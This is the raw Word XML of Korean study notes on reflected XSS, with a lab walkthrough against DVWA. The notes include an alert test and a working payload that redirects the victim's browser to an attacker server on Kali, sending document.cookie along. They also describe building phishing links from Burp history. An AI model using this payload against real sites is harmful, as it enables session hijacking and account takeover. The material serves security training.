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4DFB" w14:textId="02C8D2A6" w:rsidR="0063084A" w:rsidRDefault="00911FCE" w:rsidP="00911FCE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크로스 사이트 스크립팅 공격</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCCE2A6" w14:textId="584AFF74" w:rsidR="00911FCE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공격자가 악의적인 스크립트 코드를 웹 애플리케이션에 삽입한 후, 웹 사용자의 웹 브라우저에서 해당 코드가 실행되도록 만드는 공격</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63519DA6" w14:textId="2C11A843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다른 공격들은 취약점을 가지고 있는 서버 쪽 공격</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63585842" w14:textId="71A04205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이 공격은 서버의 취약점을 이용하여 클라이언트 쪽 공격</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A60374" w14:textId="34DB510E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예시 중 하나로 세션 쿠키 탈취가 있음 -&gt; 웹 브라우저에 있는 세션 쿠키를 자바스크립트를 이용하여 읽음</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C011158" w14:textId="6EBE84A7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코드에 따라서 다양한 형태의 공격 시도 가능</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3159CC73" w14:textId="55338809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실제 취약점을 가지고 있는 웹 서버와 상관없는 웹 사이트의 정보도 노릴 수 있음</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB39612" w14:textId="63D9A97A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 코드의 실행 시기에 따라 리플렉티드(reflected) 또는 스토어드(stored) 크로스 사이트 스크립팅 공격으로 구분할 수 있음.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4346FF7F" w14:textId="77777777" w:rsidR="00182C61" w:rsidRDefault="00182C61" w:rsidP="00911FCE">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30BAEAA5" w14:textId="4800ECC7" w:rsidR="00182C61" w:rsidRDefault="00FE1F20" w:rsidP="00911FCE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 리플렉티드 크로스 사이트 스크립팅(Reflected XSS)</w:t>
      </w:r>
      <w:r w:rsidR="00C1370D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 공격 개요</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272970E1" w14:textId="77777777" w:rsidR="00672D66" w:rsidRDefault="00C1370D" w:rsidP="000B200A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0B200A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>웹 브라우저에 사용자가 입력한 결과가 출력되는 경우, 적절한 입력값 검증 또는 대응 방안이 없</w:t>
      </w:r>
      <w:r w:rsidR="00672D66">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>음</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FE0B27" w14:textId="4D223938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0B200A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">사용자가 &lt;script&gt;와 같은 스크립트 태그를 포함한 자바스크립트 코드를 입력 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49247F0E" w14:textId="77777777" w:rsidR="00672D66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웹 페이지에 이 스크립트가 그대로 출력 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F6FE57" w14:textId="2B844B1D" w:rsidR="000B200A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672D66">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>웹 브라우저는 사용자에 의해 입력된 자바스크립트와 기존 웹 애플리케이션 개발자가 의도한 자바스크립트 구별 불가</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47523513" w14:textId="2381E8A5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입력한 자바스크립트 실행</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68137111" w14:textId="0EB73E14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요청 메시지에 입력된 스크립트 코드가 즉시 응답 메시지를 통해 출력되는 취약점</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB1C2E1" w14:textId="44272A2A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게시판에 글을 남기거나 이메일 피싱을 이용하여 악의적인 스크립트 코드가 담긴 요청을 사용자가 실행하도록 만듦.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4A8FFD" w14:textId="0E484E35" w:rsidR="00672D66" w:rsidRDefault="009E7E5E" w:rsidP="009E7E5E">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:leftChars="100" w:left="220"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E7E5E">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06ECFE54" wp14:editId="22C08539">
            <wp:extent cx="5359400" cy="2731420"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="142810284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2844" name="그림 1" descr="텍스트, 도표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842" cy="27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001" w14:textId="66E08DFD" w:rsidR="009E7E5E" w:rsidRPr="00906155" w:rsidRDefault="009E7E5E" w:rsidP="009E7E5E">
      <w:pPr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906155">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;이메일 피싱 공격 예시&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD50963" w14:textId="4B47DF09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1) 공격자가 사용자에게 이메일 등으로 피싱. (포털 사이트의 게시판, SNS 등 공격자가 링크를 남길 수 있으면 모두 가능) 피싱 시, 세션 쿠키 탈취 스크립트 코드를 삽입한 HTTP 요청 링크 포함</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1607EB6B" w14:textId="4AB295FA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2) 사용자가 링크 클릭 -&gt; 스크립트 코드가 삽입된 요청이 웹 사이트로 전송</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF7D5E0" w14:textId="7F316B2D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3) 리플렉티드 크로스 사이트 스크립팅 취약점이 있는 웹 사이트는 입력된 스크립트를 반사하여 웹 페이지에 출력</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF28291" w14:textId="3D1C3BE5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4) 웹 페이지를 읽는 웹 브라우저는 자동으로 스크립트 실행 -&gt; 그 결과인 세션 쿠키를 공격자에게 전달</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5379F482" w14:textId="7850E583" w:rsidR="002A404B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5) 공격자가 이 세션 쿠키를 사용하여 해당 사용자의 권한으로 접속</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5281C980" w14:textId="77777777" w:rsidR="002A404B" w:rsidRDefault="002A404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CB6790" w14:textId="25949D35" w:rsidR="00FD17D9" w:rsidRDefault="002A404B" w:rsidP="002A404B">
      <w:pPr>
        <w:spacing w:after="0"/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2. 리플렉티드 크로스 사이트 스크립팅(Reflected XSS) 공격 실습</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFA6C35" w14:textId="5F3003D0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500F30A2" wp14:editId="2CDEF898">
            <wp:extent cx="4343400" cy="4065349"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="180915626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6261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930" cy="40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5AC2" w14:textId="66168477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&lt;보안 레벨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Low / XSS (Reflected)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EEA896" w14:textId="05BFE600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페이지는 이름을 물어보는 폼 표시</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3DBD34" w14:textId="44CC8383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입력란에 이름을 입력하면 다음과 같은 문구 출력</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068716DC" w14:textId="15BB59FE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4F782F27" wp14:editId="31A67EF6">
            <wp:extent cx="4923367" cy="1087600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="86736329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3293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40" cy="10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385" w14:textId="10BB3799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Hello 뒤에 입력 값이 그대로 다시 출력</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9FDD38" w14:textId="3A62684B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어떤 웹 애플리케이션이 사용자가 입력한 값을 그대로 출력하는 경우, 리플렉티드 크로스 사이트 스크립팅 취약점이 존재할 가능성 높음</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D0C880" w14:textId="38788E01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9D0A83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>해당 취약점이 존재하는지 확인하기 가장 간단한 방법은 스크립트 태그 입력해보는 것</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24233365" w14:textId="1A2D190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4F25D4F1" wp14:editId="170619DE">
            <wp:extent cx="3843867" cy="374985"/>
            <wp:effectExtent l="0" t="0" r="4445" b="6350"/>
            <wp:docPr id="10348952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508" cy="3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2BB" w14:textId="01D956D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09E51534" wp14:editId="4DDC8063">
            <wp:extent cx="3843655" cy="1083392"/>
            <wp:effectExtent l="0" t="0" r="4445" b="2540"/>
            <wp:docPr id="191484523" name="그림 1" descr="텍스트, 스크린샷, 폰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523" name="그림 1" descr="텍스트, 스크린샷, 폰트, 멀티미디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71" cy="10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AEF" w14:textId="68CF36E4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함수 alert()에 의해 1이란 입력 값 출력 -&gt; 입력한 자바스크립트가 웹 브라우저에서 실행</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073116FA" w14:textId="2FF201D2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스크립트를 입력할 수 있고, 입력된 스크립트가 응답되어 리플렉티드 크로스 사이트 스크립팅 취약점이 존재한다는 것을 확인</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE9AFC0" w14:textId="6A94AF07" w:rsidR="00152476" w:rsidRDefault="00152476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0B9B66" w14:textId="1493EC31" w:rsidR="009D0A83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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09D8D943" wp14:editId="0A406DFC">
            <wp:extent cx="4148667" cy="343278"/>
            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
            <wp:docPr id="1397023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2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659" cy="3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DBA" w14:textId="21A53544" w:rsidR="000C5481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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59F948D8" wp14:editId="1E139899">
            <wp:extent cx="4186767" cy="1330117"/>
            <wp:effectExtent l="0" t="0" r="4445" b="3810"/>
            <wp:docPr id="1858117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71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607" cy="13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30C6" w14:textId="4368BDC3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스크립트를 위와 같이 입력하면, 쿠키를 출력</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBB4A0D" w14:textId="124325FE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PHPSESSID는 PHP에서 생성하는 세션 쿠키</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B16AA19" w14:textId="384D1B5A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크로스 사이트 스크립팅 공격은 주로 세션 쿠키를 알아내는 데 초점</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E13F94" w14:textId="7F14979E" w:rsidR="000C5481" w:rsidRDefault="000C5481" w:rsidP="000C5481">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:leftChars="200" w:left="440"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A1B4C88" w14:textId="351CFDE8" w:rsidR="002875BD" w:rsidRDefault="00C37311" w:rsidP="00C37311">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:leftChars="200" w:left="440"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37311">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3445737D" wp14:editId="139B55D9">
            <wp:extent cx="4131733" cy="600337"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="148638759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7596" name="그림 1" descr="텍스트, 폰트, 스크린샷, 그래픽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65" cy="6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AD54" w14:textId="003077E4" w:rsidR="00C37311" w:rsidRDefault="00C3731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위의 세션 쿠키를 공격자(kali linux)로 전달하기 위해 웹 서버 시작</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A8914A" w14:textId="77777777" w:rsidR="00C37311" w:rsidRDefault="00C37311" w:rsidP="000C5481">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:leftChars="200" w:left="440"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29745F45" w14:textId="11E503C8" w:rsidR="00C37311" w:rsidRDefault="00C37311" w:rsidP="00C37311">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:leftChars="200" w:left="440"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37311">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19CED857" wp14:editId="1C3FDDF2">
            <wp:extent cx="4758267" cy="5011957"/>
            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
            <wp:docPr id="142909545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5456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140" cy="50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AA6" w14:textId="77777777" w:rsidR="00C37311" w:rsidRDefault="00C37311" w:rsidP="00C3731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칼리 리눅스의 현재 ip 주소는 192.168.56.103</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD4AB7A" w14:textId="0C1C3AC5" w:rsidR="00C37311" w:rsidRDefault="00C3731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서버가 제대로 시작되었다면 웹 브라우저로 접속했을 때, 위와 같은 화면 표시됨</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7D1825" w14:textId="5D1435B5" w:rsidR="00C37311" w:rsidRDefault="00C37311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C1AB13" w14:textId="17A299FA" w:rsidR="00EE5EFB" w:rsidRDefault="00EE5EFB" w:rsidP="00EE5EFB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:leftChars="200" w:left="440"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE5EFB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53F9D3C0" wp14:editId="66E89C18">
            <wp:extent cx="5588431" cy="766233"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11547159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93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945" cy="7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CDC" w14:textId="5184218D" w:rsidR="00EE5EFB" w:rsidRDefault="00EE5EFB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실습 중 로그 파일 모니터링을 위한 명령어</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B39C0DE" w14:textId="32807D84" w:rsidR="00EE5EFB" w:rsidRDefault="00EE5EFB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access.log 파일은 접근 로그를 기록하는 파일 -&gt; 웹 서버로 들어온 요청 정보 기록</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381F1F92" w14:textId="77777777" w:rsidR="00102E31" w:rsidRDefault="00102E31" w:rsidP="00EE5EFB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:leftChars="200" w:left="440"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68AFAD0C" w14:textId="368E9767" w:rsidR="00102E31" w:rsidRDefault="00102E31" w:rsidP="00102E3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DVWA 실습 페이지 입력란에 아래와 같은 스크립트 입력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0016"/>
      </w:tblGrid>
      <w:tr w:rsidR="00102E31" w14:paraId="127E70D6" w14:textId="77777777" w:rsidTr="00102E31">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="483E20D5" w14:textId="6E0EBC6A" w:rsidR="00102E31" w:rsidRPr="00102E31" w:rsidRDefault="00102E31" w:rsidP="00EE5EF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&lt;script&gt;document.location=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http://192.168.56.103/cookie?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+document.cookie&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="72787805" w14:textId="7B62C243" w:rsidR="00102E31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document.location을 이용하여 지정한 위치로 리다이렉트</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6786C5CF" w14:textId="640E0A2B" w:rsidR="00FB70E3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 실행시, 웹 브라우저는 공격자의 호스트로 접속</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E489B18" w14:textId="77777777" w:rsidR="008123FE" w:rsidRDefault="008123FE" w:rsidP="00EE5EFB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:leftChars="200" w:left="440"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E85C806" w14:textId="0C7AB013" w:rsidR="008123FE" w:rsidRDefault="008123FE" w:rsidP="008123FE">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:leftChars="200" w:left="440"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008123FE">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59C17290" wp14:editId="603A17B2">
            <wp:extent cx="5020733" cy="717179"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="75853193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1935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518" cy="7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5E17" w14:textId="77777777" w:rsidR="00FB70E3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요청 전송시, 리다이렉트 후 에러 발생 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AD7969" w14:textId="053539D3" w:rsidR="00FB70E3" w:rsidRDefault="00FB70E3" w:rsidP="00FB70E3">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:leftChars="200" w:left="4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-&gt; 리다이렉트 된 cookie라는 URL이 공격자의 호스트에 존재하지 않기 때문 -&gt; 상관 X</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C155A9F" w14:textId="1700C03A" w:rsidR="00FB70E3" w:rsidRDefault="008123FE" w:rsidP="008123FE">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:leftChars="100" w:left="220" w:firstLine="198"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008123FE">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44BEA567" wp14:editId="139FEDBC">
            <wp:extent cx="5490634" cy="1046085"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="631771521" name="그림 1" descr="텍스트, 스크린샷, 폰트, 정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1521" name="그림 1" descr="텍스트, 스크린샷, 폰트, 정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541" cy="10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C01B" w14:textId="77777777" w:rsidR="008123FE" w:rsidRDefault="008123FE" w:rsidP="008123FE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실습에서는 접근 로그가 중요</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409FACEA" w14:textId="77777777" w:rsidR="008123FE" w:rsidRDefault="008123FE" w:rsidP="008123FE">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:leftChars="200" w:left="44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>-&gt; 모니터링하고 있던 접근 로그를 살펴보면 새로운 내용 기록된 것을 확인 가능</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A287B58" w14:textId="1DB8C051" w:rsidR="008123FE" w:rsidRDefault="008123FE" w:rsidP="00FB70E3">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:leftChars="100" w:left="22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>- 새로운 로그 중 GET /cookie? 문자열 이후 나오는 내용이 document.cookie에 의해 출력된 쿠키 정보</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BEF6F6" w14:textId="47B2DFEC" w:rsidR="008123FE" w:rsidRDefault="008123FE" w:rsidP="00FB70E3">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:leftChars="100" w:left="22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B93B81">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>리플렉티드 크로스 사이트 스크립트는 위와 같이 직접 입력보다는 피싱을 통해 정보 탈취</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60605A00" w14:textId="462D6651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취약점이 있는 링크를 클릭하게 만드는 것</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D25963" w14:textId="232DCC3E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Burp Suite의 Proxy 히스토리를 이용해 링크를 확인 가능</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD2A42C" w14:textId="4EBFBE5F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이 요청 메시지를 이용하여 피싱에 사용할 링크 만들 수 있음</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFBFAE3" w14:textId="0A458C76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</w:p>
    <w:p w14:paraId="56B1B01A" w14:textId="46E489EA" w:rsidR="00B93B81" w:rsidRPr="00B93B81" w:rsidRDefault="00210C49" w:rsidP="00B93B81">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLineChars="200"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AD03A1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00F602D7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00B93B81" w:rsidRPr="00B93B81" w:rsidSect="00911F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1"/>
    <w:rsid w:val="000B200A"/>
    <w:rsid w:val="000C5481"/>
    <w:rsid w:val="000E41F3"/>
    <w:rsid w:val="00102E31"/>
    <w:rsid w:val="00152476"/>
    <w:rsid w:val="00182C61"/>
    <w:rsid w:val="001C2921"/>
    <w:rsid w:val="00210C49"/>
    <w:rsid w:val="00213827"/>
    <w:rsid w:val="00235E85"/>
    <w:rsid w:val="002875BD"/>
    <w:rsid w:val="002A404B"/>
    <w:rsid w:val="002B4141"/>
    <w:rsid w:val="005079E7"/>
    <w:rsid w:val="0063084A"/>
    <w:rsid w:val="00672D66"/>
    <w:rsid w:val="008123FE"/>
    <w:rsid w:val="00906155"/>
    <w:rsid w:val="00911FCE"/>
    <w:rsid w:val="009D0A83"/>
    <w:rsid w:val="009E7E5E"/>
    <w:rsid w:val="00AD03A1"/>
    <w:rsid w:val="00B76007"/>
    <w:rsid w:val="00B93B81"/>
    <w:rsid w:val="00BE3C83"/>
    <w:rsid w:val="00C1370D"/>
    <w:rsid w:val="00C37311"/>
    <w:rsid w:val="00E726BB"/>
    <w:rsid w:val="00EE5EFB"/>
    <w:rsid w:val="00F602D7"/>
    <w:rsid w:val="00FA069C"/>
    <w:rsid w:val="00FB70E3"/>
    <w:rsid w:val="00FD17D9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B919"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{AC1651E6-435D-4F75-BEC2-F5268C3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41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4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41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41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41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41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41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41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41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41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41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4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41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41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41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41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414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2E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24</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-08-18T14:06:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-08-25T14:29:00Z</dcterms:modified>
</cp:coreProperties>
</file>